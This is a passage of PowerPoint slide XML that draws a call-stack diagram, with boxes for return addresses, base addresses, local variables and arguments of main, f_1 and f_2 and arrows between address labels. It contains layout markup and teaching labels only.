                              <a:solidFill>
                                <a:srgbClr val="FF0000"/>
                              </a:solidFill>
                            </a:endParaRPr>
                          </a:p>
                        </p:txBody>
                      </p:sp>
                      <p:grpSp>
                        <p:nvGrpSpPr>
                          <p:cNvPr id="35" name="组合 34">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3093D8C-284F-4DC2-AD36-3B1CCFD47E67}"/>
                              </a:ext>
                            </a:extLst>
                          </p:cNvPr>
                          <p:cNvGrpSpPr/>
                          <p:nvPr/>
                        </p:nvGrpSpPr>
                        <p:grpSpPr>
                          <a:xfrm>
                            <a:off x="6964304" y="228815"/>
                            <a:ext cx="2390724" cy="2926238"/>
                            <a:chOff x="6964304" y="228815"/>
                            <a:chExt cx="2390724" cy="2926238"/>
                          </a:xfrm>
                        </p:grpSpPr>
                        <p:cxnSp>
                          <p:nvCxnSpPr>
                            <p:cNvPr id="120" name="Shape 640">
                              <a:extLst>
                                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB036AB8-5451-4D6F-BC47-91656F5CD9F3}"/>
                                </a:ext>
                              </a:extLst>
                            </p:cNvPr>
                            <p:cNvCxnSpPr>
                              <a:cxnSpLocks/>
                            </p:cNvCxnSpPr>
                            <p:nvPr/>
                          </p:nvCxnSpPr>
                          <p:spPr>
                            <a:xfrm>
                              <a:off x="6964304" y="770259"/>
                              <a:ext cx="686232" cy="0"/>
                            </a:xfrm>
                            <a:prstGeom prst="straightConnector1">
                              <a:avLst/>
                            </a:prstGeom>
                            <a:noFill/>
                            <a:ln w="9525" cap="flat" cmpd="sng">
                              <a:solidFill>
                                <a:schemeClr val="dk2"/>
                              </a:solidFill>
                              <a:prstDash val="solid"/>
                              <a:round/>
                              <a:headEnd type="none" w="med" len="med"/>
                              <a:tailEnd type="triangle" w="med" len="med"/>
                            </a:ln>
                          </p:spPr>
                        </p:cxnSp>
                        <p:cxnSp>
                          <p:nvCxnSpPr>
                            <p:cNvPr id="122" name="Shape 640">
                              <a:extLst>
                                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C023356F-D8FD-44A0-B744-5F9BA0B09842}"/>
                                </a:ext>
                              </a:extLst>
                            </p:cNvPr>
                            <p:cNvCxnSpPr>
                              <a:cxnSpLocks/>
                            </p:cNvCxnSpPr>
                            <p:nvPr/>
                          </p:nvCxnSpPr>
                          <p:spPr>
                            <a:xfrm>
                              <a:off x="6964304" y="1842836"/>
                              <a:ext cx="686232" cy="0"/>
                            </a:xfrm>
                            <a:prstGeom prst="straightConnector1">
                              <a:avLst/>
                            </a:prstGeom>
                            <a:noFill/>
                            <a:ln w="9525" cap="flat" cmpd="sng">
                              <a:solidFill>
                                <a:schemeClr val="dk2"/>
                              </a:solidFill>
                              <a:prstDash val="solid"/>
                              <a:round/>
                              <a:headEnd type="none" w="med" len="med"/>
                              <a:tailEnd type="triangle" w="med" len="med"/>
                            </a:ln>
                          </p:spPr>
                        </p:cxnSp>
                        <p:cxnSp>
                          <p:nvCxnSpPr>
                            <p:cNvPr id="133" name="Shape 640">
                              <a:extLst>
                                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D815369-881E-48CF-B598-1AE0DDFB469B}"/>
                                </a:ext>
                              </a:extLst>
                            </p:cNvPr>
                            <p:cNvCxnSpPr>
                              <a:cxnSpLocks/>
                            </p:cNvCxnSpPr>
                            <p:nvPr/>
                          </p:nvCxnSpPr>
                          <p:spPr>
                            <a:xfrm>
                              <a:off x="6967318" y="2887677"/>
                              <a:ext cx="686232" cy="0"/>
                            </a:xfrm>
                            <a:prstGeom prst="straightConnector1">
                              <a:avLst/>
                            </a:prstGeom>
                            <a:noFill/>
                            <a:ln w="9525" cap="flat" cmpd="sng">
                              <a:solidFill>
                                <a:schemeClr val="dk2"/>
                              </a:solidFill>
                              <a:prstDash val="solid"/>
                              <a:round/>
                              <a:headEnd type="none" w="med" len="med"/>
                              <a:tailEnd type="triangle" w="med" len="med"/>
                            </a:ln>
                          </p:spPr>
                        </p:cxnSp>
                        <p:grpSp>
                          <p:nvGrpSpPr>
                            <p:cNvPr id="34" name="组合 33">
                              <a:extLst>
                                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80C404AA-D14F-4107-B140-456F1B11DFB9}"/>
                                </a:ext>
                              </a:extLst>
                            </p:cNvPr>
                            <p:cNvGrpSpPr/>
                            <p:nvPr/>
                          </p:nvGrpSpPr>
                          <p:grpSpPr>
                            <a:xfrm>
                              <a:off x="7057318" y="228815"/>
                              <a:ext cx="2297710" cy="2926238"/>
                              <a:chOff x="7057318" y="228815"/>
                              <a:chExt cx="2297710" cy="2926238"/>
                            </a:xfrm>
                          </p:grpSpPr>
                          <p:sp>
                            <p:nvSpPr>
                              <p:cNvPr id="134" name="Shape 636">
                                <a:extLst>
                                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EBE1DF7-D69B-4281-9FE4-D9228A443AB5}"/>
                                  </a:ext>
                                </a:extLst>
                              </p:cNvPr>
                              <p:cNvSpPr/>
                              <p:nvPr/>
                            </p:nvSpPr>
                            <p:spPr>
                              <a:xfrm>
                                <a:off x="7061194" y="2538961"/>
                                <a:ext cx="1280003" cy="481801"/>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000" dirty="0">
                                    <a:latin typeface="Consolas"/>
                                    <a:ea typeface="Consolas"/>
                                    <a:cs typeface="Consolas"/>
                                    <a:sym typeface="Consolas"/>
                                  </a:rPr>
                                  <a:t>addr7</a:t>
                                </a:r>
                                <a:endParaRPr sz="1000" dirty="0">
                                  <a:latin typeface="Consolas"/>
                                  <a:ea typeface="Consolas"/>
                                  <a:cs typeface="Consolas"/>
                                  <a:sym typeface="Consolas"/>
                                </a:endParaRPr>
                              </a:p>
                            </p:txBody>
                          </p:sp>
                          <p:grpSp>
                            <p:nvGrpSpPr>
                              <p:cNvPr id="33" name="组合 32">
                                <a:extLst>
                                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF11B09F-5D2E-4801-93F4-EE6CC7E729E8}"/>
                                  </a:ext>
                                </a:extLst>
                              </p:cNvPr>
                              <p:cNvGrpSpPr/>
                              <p:nvPr/>
                            </p:nvGrpSpPr>
                            <p:grpSpPr>
                              <a:xfrm>
                                <a:off x="7057318" y="228815"/>
                                <a:ext cx="2297710" cy="2926238"/>
                                <a:chOff x="7057318" y="228815"/>
                                <a:chExt cx="2297710" cy="2926238"/>
                              </a:xfrm>
                            </p:grpSpPr>
                            <p:sp>
                              <p:nvSpPr>
                                <p:cNvPr id="121" name="Shape 636">
                                  <a:extLst>
                                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{441148BD-89D1-4BD2-A664-2581A221A4A8}"/>
                                    </a:ext>
                                  </a:extLst>
                                </p:cNvPr>
                                <p:cNvSpPr/>
                                <p:nvPr/>
                              </p:nvSpPr>
                              <p:spPr>
                                <a:xfrm>
                                  <a:off x="7057318" y="404919"/>
                                  <a:ext cx="1277850" cy="481801"/>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000" dirty="0">
                                      <a:latin typeface="Consolas"/>
                                      <a:ea typeface="Consolas"/>
                                      <a:cs typeface="Consolas"/>
                                      <a:sym typeface="Consolas"/>
                                    </a:rPr>
                                    <a:t>addr15</a:t>
                                  </a:r>
                                  <a:endParaRPr sz="1000" dirty="0">
                                    <a:latin typeface="Consolas"/>
                                    <a:ea typeface="Consolas"/>
                                    <a:cs typeface="Consolas"/>
                                    <a:sym typeface="Consolas"/>
                                  </a:endParaRPr>
                                </a:p>
                              </p:txBody>
                            </p:sp>
                            <p:grpSp>
                              <p:nvGrpSpPr>
                                <p:cNvPr id="32" name="组合 31">
                                  <a:extLst>
                                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C93E9F2-44D0-4D12-AB14-323DB6B26063}"/>
                                    </a:ext>
                                  </a:extLst>
                                </p:cNvPr>
                                <p:cNvGrpSpPr/>
                                <p:nvPr/>
                              </p:nvGrpSpPr>
                              <p:grpSpPr>
                                <a:xfrm>
                                  <a:off x="7650536" y="228815"/>
                                  <a:ext cx="1704492" cy="2926238"/>
                                  <a:chOff x="7650536" y="228815"/>
                                  <a:chExt cx="1704492" cy="2926238"/>
                                </a:xfrm>
                              </p:grpSpPr>
                              <p:sp>
                                <p:nvSpPr>
                                  <p:cNvPr id="137" name="Shape 650">
                                    <a:extLst>
                                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F794D134-1C39-44AD-B690-205150EB7C78}"/>
                                      </a:ext>
                                    </a:extLst>
                                  </p:cNvPr>
                                  <p:cNvSpPr/>
                                  <p:nvPr/>
                                </p:nvSpPr>
                                <p:spPr>
                                  <a:xfrm>
                                    <a:off x="7650536" y="2887677"/>
                                    <a:ext cx="1704489" cy="267376"/>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solidFill>
                                          <a:schemeClr val="accent5"/>
                                        </a:solidFill>
                                      </a:rPr>
                                      <a:t>f_2</a:t>
                                    </a:r>
                                    <a:r>
                                      <a:rPr lang="en-US" sz="1100" dirty="0"/>
                                      <a:t>’s local variables</a:t>
                                    </a:r>
                                    <a:endParaRPr sz="1100" dirty="0">
                                      <a:solidFill>
                                        <a:schemeClr val="accent5"/>
                                      </a:solidFill>
                                    </a:endParaRPr>
                                  </a:p>
                                </p:txBody>
                              </p:sp>
                              <p:grpSp>
                                <p:nvGrpSpPr>
                                  <p:cNvPr id="31" name="组合 30">
                                    <a:extLst>
                                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8E23EC7-7517-4C1E-A6C1-D83DB6DD4022}"/>
                                      </a:ext>
                                    </a:extLst>
                                  </p:cNvPr>
                                  <p:cNvGrpSpPr/>
                                  <p:nvPr/>
                                </p:nvGrpSpPr>
                                <p:grpSpPr>
                                  <a:xfrm>
                                    <a:off x="7650537" y="228815"/>
                                    <a:ext cx="1704491" cy="2403703"/>
                                    <a:chOff x="7650537" y="228815"/>
                                    <a:chExt cx="1704491" cy="2403703"/>
                                  </a:xfrm>
                                </p:grpSpPr>
                                <p:sp>
                                  <p:nvSpPr>
                                    <p:cNvPr id="104" name="Shape 621">
                                      <a:extLst>
                                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89895C62-86EB-4F81-947D-ED42E8058D7F}"/>
                                        </a:ext>
                                      </a:extLst>
                                    </p:cNvPr>
                                    <p:cNvSpPr/>
                                    <p:nvPr/>
                                  </p:nvSpPr>
                                  <p:spPr>
                                    <a:xfrm>
                                      <a:off x="7650538" y="228815"/>
                                      <a:ext cx="1704489" cy="270722"/>
                                    </a:xfrm>
                                    <a:prstGeom prst="rect">
                                      <a:avLst/>
                                    </a:prstGeom>
                                    <a:solidFill>
                                      <a:schemeClr val="accent5">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en-US" altLang="zh-CN" sz="1100" dirty="0"/>
                                        <a:t>Return address</a:t>
                                      </a:r>
                                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" b="1" dirty="0">
                                        <a:solidFill>
                                          <a:schemeClr val="accent5"/>
                                        </a:solidFill>
                                      </a:endParaRPr>
                                    </a:p>
                                  </p:txBody>
                                </p:sp>
                                <p:sp>
                                  <p:nvSpPr>
                                    <p:cNvPr id="105" name="Shape 647">
                                      <a:extLst>
                                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE1E06C9-9637-4F6F-A4D8-87111E168B56}"/>
                                        </a:ext>
                                      </a:extLst>
                                    </p:cNvPr>
                                    <p:cNvSpPr/>
                                    <p:nvPr/>
                                  </p:nvSpPr>
                                  <p:spPr>
                                    <a:xfrm>
                                      <a:off x="7650538" y="499537"/>
                                      <a:ext cx="1704489" cy="270722"/>
                                    </a:xfrm>
                                    <a:prstGeom prst="rect">
                                      <a:avLst/>
                                    </a:prstGeom>
                                    <a:solidFill>
                                      <a:schemeClr val="accent6">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100" dirty="0">
                                          <a:solidFill>
                                            <a:schemeClr val="accent5"/>
                                          </a:solidFill>
                                        </a:rPr>
                                        <a:t>main</a:t>
                                      </a:r>
                                      <a:r>
                                        <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
                                        <a:t>’s base-</a:t>
                                      </a:r>
                                      <a:r>
                                        <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
                                        <a:t>adess</a:t>
                                      </a:r>
                                      <a:endParaRPr sz="1100" dirty="0"/>
                                    </a:p>
                                  </p:txBody>
                                </p:sp>
                                <p:sp>
                                  <p:nvSpPr>
                                    <p:cNvPr id="106" name="Shape 648">
                                      <a:extLst>
                                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09728D71-CF37-4848-A413-06E86DC8FA69}"/>
                                        </a:ext>
                                      </a:extLst>
                                    </p:cNvPr>
                                    <p:cNvSpPr/>
                                    <p:nvPr/>
                                  </p:nvSpPr>
                                  <p:spPr>
                                    <a:xfrm>
                                      <a:off x="7650539" y="1037363"/>
                                      <a:ext cx="1704489" cy="270721"/>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t>arg1_m~arg1_1</a:t>
                                      </a:r>
                                      <a:endParaRPr lang="en" sz="1100" dirty="0"/>
                                    </a:p>
                                  </p:txBody>
                                </p:sp>
                                <p:sp>
                                  <p:nvSpPr>
                                    <p:cNvPr id="107" name="Shape 620">
                                      <a:extLst>
                                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE747F04-9582-42CE-A0AC-9542F6BF319A}"/>
                                        </a:ext>
                                      </a:extLst>
                                    </p:cNvPr>
                                    <p:cNvSpPr/>
                                    <p:nvPr/>
                                  </p:nvSpPr>
                                  <p:spPr>
                                    <a:xfrm>
                                      <a:off x="7650537" y="1304738"/>
                                      <a:ext cx="1704490" cy="270721"/>
                                    </a:xfrm>
                                    <a:prstGeom prst="rect">
                                      <a:avLst/>
                                    </a:prstGeom>
                                    <a:solidFill>
                                      <a:schemeClr val="accent5">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altLang="zh-CN" sz="1100" dirty="0"/>
                                        <a:t>Return address = </a:t>
                                      </a:r>
                                      <a:r>
                                        <a:rPr lang="en-US" altLang="zh-CN" sz="1100" b="1" dirty="0">
                                          <a:solidFill>
                                            <a:srgbClr val="FF0000"/>
                                          </a:solidFill>
                                        </a:rPr>
                                        <a:t>addr1</a:t>
                                      </a:r>
                                    </a:p>
                                  </p:txBody>
                                </p:sp>
                                <p:sp>
                                  <p:nvSpPr>
                                    <p:cNvPr id="108" name="Shape 649">
                                      <a:extLst>
                                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE39C899-A714-43D6-9152-F27AC2EAAB88}"/>
                                        </a:ext>
                                      </a:extLst>
                                    </p:cNvPr>
                                    <p:cNvSpPr/>
                                    <p:nvPr/>
                                  </p:nvSpPr>
                                  <p:spPr>
                                    <a:xfrm>
                                      <a:off x="7650539" y="1575460"/>
                                      <a:ext cx="1704489" cy="267376"/>
                                    </a:xfrm>
                                    <a:prstGeom prst="rect">
                                      <a:avLst/>
                                    </a:prstGeom>
                                    <a:solidFill>
                                      <a:schemeClr val="accent6">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100" dirty="0">
                                          <a:solidFill>
                                            <a:schemeClr val="accent5"/>
                                          </a:solidFill>
                                        </a:rPr>
                                        <a:t>f_1</a:t>
                                      </a:r>
                                      <a:r>
                                        <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
                                        <a:t>’s base-addr = </a:t>
                                      </a:r>
                                      <a:r>
                                        <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0">
                                          <a:solidFill>
                                            <a:srgbClr val="FF0000"/>
                                          </a:solidFill>
                                        </a:rPr>
                                        <a:t>addr15 </a:t>
                                      </a:r>
                                      <a:endParaRPr sz="1100" dirty="0">
                                        <a:solidFill>
                                          <a:srgbClr val="FF0000"/>
                                        </a:solidFill>
                                      </a:endParaRPr>
                                    </a:p>
                                  </p:txBody>
                                </p:sp>
                                <p:sp>
                                  <p:nvSpPr>
                                    <p:cNvPr id="109" name="Shape 650">
                                      <a:extLst>
                                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54531323-56E2-464C-B8B6-BB46FDBB73A1}"/>
                                        </a:ext>
                                      </a:extLst>
                                    </p:cNvPr>
                                    <p:cNvSpPr/>
                                    <p:nvPr/>
                                  </p:nvSpPr>
                                  <p:spPr>
                                    <a:xfrm>
                                      <a:off x="7650539" y="1842837"/>
                                      <a:ext cx="1704489" cy="267376"/>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solidFill>
                                            <a:schemeClr val="accent5"/>
                                          </a:solidFill>
                                        </a:rPr>
                                        <a:t>f_1</a:t>
                                      </a:r>
                                      <a:r>
                                        <a:rPr lang="en-US" sz="1100" dirty="0"/>
                                        <a:t>’s local variables</a:t>
                                      </a:r>
                                      <a:endParaRPr sz="1100" dirty="0">
                                        <a:solidFill>
                                          <a:schemeClr val="accent5"/>
                                        </a:solidFill>
                                      </a:endParaRPr>
                                    </a:p>
                                  </p:txBody>
                                </p:sp>
                                <p:sp>
                                  <p:nvSpPr>
                                    <p:cNvPr id="111" name="Shape 651">
                                      <a:extLst>
                                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA7D70FB-3486-4606-B1F7-8D74BF6C7EA5}"/>
                                        </a:ext>
                                      </a:extLst>
                                    </p:cNvPr>
                                    <p:cNvSpPr/>
                                    <p:nvPr/>
                                  </p:nvSpPr>
                                  <p:spPr>
                                    <a:xfrm>
                                      <a:off x="7650539" y="2110214"/>
                                      <a:ext cx="1704489" cy="262422"/>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100" dirty="0"/>
                                        <a:t>arg_k~arg_i</a:t>
                                      </a:r>
                                    </a:p>
                                  </p:txBody>
                                </p:sp>
                                <p:sp>
                                  <p:nvSpPr>
                                    <p:cNvPr id="131" name="Shape 651">
                                      <a:extLst>
                                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25D106A6-137D-44DC-83EF-C201C38EFA78}"/>
                                        </a:ext>
                                      </a:extLst>
                                    </p:cNvPr>
                                    <p:cNvSpPr/>
                                    <p:nvPr/>
                                  </p:nvSpPr>
                                  <p:spPr>
                                    <a:xfrm>
                                      <a:off x="7650537" y="2370096"/>
                                      <a:ext cx="1704489" cy="262422"/>
                                    </a:xfrm>
                                    <a:prstGeom prst="rect">
                                      <a:avLst/>
                                    </a:prstGeom>
                                    <a:solidFill>
                                      <a:schemeClr val="accent5">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t>Return address = </a:t>
                                      </a:r>
                                      <a:r>
                                        <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                                          <a:solidFill>
                                            <a:srgbClr val="FF0000"/>
                                          </a:solidFill>
                                        </a:rPr>
                                        <a:t>addr2</a:t>
                                      </a:r>
                                      <a:endParaRPr sz="1100" b="1" dirty="0">
                                        <a:solidFill>
                                          <a:srgbClr val="FF0000"/>
                                        </a:solidFill>
                                      </a:endParaRPr>
                                    </a:p>
                                  </p:txBody>
                                </p:sp>
                                <p:sp>
                                  <p:nvSpPr>
                                    <p:cNvPr id="80" name="Shape 650">
                                      <a:extLst>
                                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43FD069D-E709-4AD2-AC0B-E996929800B8}"/>
                                        </a:ext>
                                      </a:extLst>
                                    </p:cNvPr>
                                    <p:cNvSpPr/>
                                    <p:nvPr/>
                                  </p:nvSpPr>
                                  <p:spPr>
                                    <a:xfrm>
                                      <a:off x="7650538" y="769985"/>
                                      <a:ext cx="1704489" cy="272859"/>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100" dirty="0">
                                          <a:solidFill>
                                            <a:schemeClr val="accent5"/>
                                          </a:solidFill>
                                        </a:rPr>
                                        <a:t>main</a:t>
                                      </a:r>
                                      <a:r>
                                        <a:rPr lang="en-US" sz="1100" dirty="0"/>
                                        <a:t>’s local variables</a:t>
                                      </a:r>
                                      <a:endParaRPr sz="1100" dirty="0">
                                        <a:solidFill>
                                          <a:schemeClr val="accent5"/>
                                        </a:solidFill>
                                      </a:endParaRPr>
                                    </a:p>
                                  </p:txBody>
                                </p:sp>
                              </p:grpSp>
                            </p:grpSp>
                          </p:grpSp>
                        </p:grpSp>
                      </p:grpSp>
                      <p:cxnSp>
                        <p:nvCxnSpPr>
                          <p:cNvPr id="126" name="Shape 640">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14BB5D2D-3D21-4FF5-9252-1102839E8ADA}"/>
                              </a:ext>
                            </a:extLst>
                          </p:cNvPr>
                          <p:cNvCxnSpPr>
                            <a:cxnSpLocks/>
                            <a:stCxn id="125" idx="1"/>
                          </p:cNvCxnSpPr>
                          <p:nvPr/>
                        </p:nvCxnSpPr>
                        <p:spPr>
                          <a:xfrm flipH="1">
                            <a:off x="9043510" y="589999"/>
                            <a:ext cx="819397" cy="1043977"/>
                          </a:xfrm>
                          <a:prstGeom prst="straightConnector1">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525" cap="flat" cmpd="sng">
                            <a:solidFill>
                              <a:schemeClr val="dk2"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                            <a:round/>
                            <a:headEnd type="none" w="med" len="med"/>
                            <a:tailEnd type="triangle" w="med" len="med"/>
                          </a:ln>
                        </p:spPr>
                      </p:cxnSp>
                      <p:cxnSp>
                        <p:nvCxnSpPr>
                          <p:cNvPr id="135" name="Shape 640">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA862EC-E646-4675-BDAC-01D46037A275}"/>
                              </a:ext>
                            </a:extLst>
                          </p:cNvPr>
                          <p:cNvCxnSpPr>
                            <a:cxnSpLocks/>
                            <a:stCxn id="124" idx="1"/>
                          </p:cNvCxnSpPr>
                          <p:nvPr/>
                        </p:nvCxnSpPr>
                        <p:spPr>
                          <a:xfrm flipH="1">
                            <a:off x="9043510" y="1665921"/>
                            <a:ext cx="831049" cy="1034486"/>
                          </a:xfrm>
                          <a:prstGeom prst="straightConnector1">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525" cap="flat" cmpd="sng">
                            <a:solidFill>
                              <a:schemeClr val="dk2"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                            <a:round/>
                            <a:headEnd type="none" w="med" len="med"/>
                            <a:tailEnd type="triangle" w="med" len="med"/>
                          </a:ln>
                        </p:spPr>
                      </p:cxnSp>
                    </p:grpSp>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="95" name="Shape 636">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA7B19F5-7658-4D03-8FD6-4B99CFA73F55}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr/>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr>
                        <a:xfrm>
                          <a:off x="7056759" y="2815522"/>
                          <a:ext cx="1287214" cy="481801"/>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000" dirty="0">
                              <a:latin typeface="Consolas"/>
                              <a:ea typeface="Consolas"/>
                              <a:cs typeface="Consolas"/>
                              <a:sym typeface="Consolas"/>
                            </a:rPr>
                            <a:t>addr6</a:t>
                          </a:r>
                          <a:endParaRPr sz="1000" dirty="0">
                            <a:latin typeface="Consolas"/>
                            <a:ea typeface="Consolas"/>
                            <a:cs typeface="Consolas"/>
                            <a:sym typeface="Consolas"/>
                          </a:endParaRPr>
                        </a:p>
                      </p:txBody>
                    </p:sp>
                  </p:grpSp>
                </p:grpSp>
                <p:cxnSp>
                  <p:nvCxnSpPr>
                    <p:cNvPr id="102" name="Shape 640">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA62C9B8-D06E-47B4-9F52-FD0F3032336A}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvCxnSpPr>
                      <a:cxnSpLocks/>
                      <a:stCxn id="125" idx="2"/>
                      <a:endCxn id="124" idx="0"/>
                    </p:cNvCxnSpPr>
                    <p:nvPr/>
                  </p:nvCxnSpPr>
                  <p:spPr>
                    <a:xfrm>
                      <a:off x="10522842" y="677970"/>
                      <a:ext cx="11719" cy="890066"/>
                    </a:xfrm>
                    <a:prstGeom prst="straightConnector1">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:schemeClr val="dk2"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="triangle" w="med" len="med"/>
                    </a:ln>
                    <a:effectLst>
                      <a:glow rad="101600">
                        <a:schemeClr val="accent4">
                          <a:satMod val="175000"/>
                          <a:alpha val="40000"/>
                        </a:schemeClr>
                      </a:glow>
                    </a:effectLst>
                  </p:spPr>
                </p:cxnSp>
              </p:grpSp>
              <p:cxnSp>
                <p:nvCxnSpPr>
                  <p:cNvPr id="114" name="Shape 640">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{743B5AEB-2612-4BA7-9D0F-7B8D16D628F6}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvCxnSpPr>
                    <a:cxnSpLocks/>
                    <a:stCxn id="124" idx="2"/>
                    <a:endCxn id="136" idx="0"/>
                  </p:cNvCxnSpPr>
                  <p:nvPr/>
                </p:nvCxnSpPr>
                <p:spPr>
                  <a:xfrm flipH="1">
                    <a:off x="10522842" y="1747962"/>
                    <a:ext cx="11719" cy="871994"/>
                  </a:xfrm>
                  <a:prstGeom prst="straightConnector1">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="9525" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:schemeClr val="dk2"/>
                    </a:solidFill>
                    <a:prstDash val="solid"/>
                    <a:round/>
                    <a:headEnd type="none" w="med" len="med"/>
                    <a:tailEnd type="triangle" w="med" len="med"/>
                  </a:ln>
                  <a:effectLst>
                    <a:glow rad="101600">
                      <a:schemeClr val="accent4">
                        <a:satMod val="175000"/>
                        <a:alpha val="40000"/>
                      </a:schemeClr>
                    </a:glow>
                  </a:effectLst>
                </p:spPr>
              </p:cxnSp>
            </p:grpSp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="70" name="组合 69">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFC2E5E4-0117-412E-A8CC-01215FB8031A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="6964304" y="1680540"/>
                  <a:ext cx="1374534" cy="389440"/>
                  <a:chOff x="6964304" y="1680540"/>
                  <a:chExt cx="1374534" cy="389440"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:cxnSp>
                <p:nvCxnSpPr>
                  <p:cNvPr id="196" name="Shape 640">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC15681F-BB09-4096-AF9F-24C060501724}"/>
                      </a:ext>
                    </a:extLst>
